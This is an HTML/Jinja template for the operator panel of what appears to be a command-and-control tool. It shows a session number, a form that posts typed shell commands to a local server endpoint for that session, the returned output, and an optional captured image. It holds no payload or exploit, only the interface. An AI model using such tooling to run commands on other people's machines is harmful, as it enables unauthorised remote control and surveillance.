<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Execute</title>
    <style>
        body{
            background:black;
            color:green
        }
        h1,h2{
            margin:0;
            padding:0;
        }
        img{
            margin-top:2em;
            width:60%;
        }
        form{
            margin-top:1em;
        }
        .submit{
            background:green;
            color:black;
            height:36px;
        }
        .input{
            height:30px;
            width:300px;
        }
    </style>
</head>
<body>
    <h1>Welcome to C2</h1>
    <h2>Session: {{i}}</h2>
    <form action="http://127.0.0.1:5000/session{{i}}/executecmd" method="POST">
        <input type="text" placeholder="Enter cmd....." name="cmd" class="input">
        <input type="submit" value="Submit" class="submit">
    </form>
    <pre>{{ output }}</pre>
    {% if imgLink != "" %}
    <img src=../{{imgLink}}>
    {% endif %}
</body>
</html>
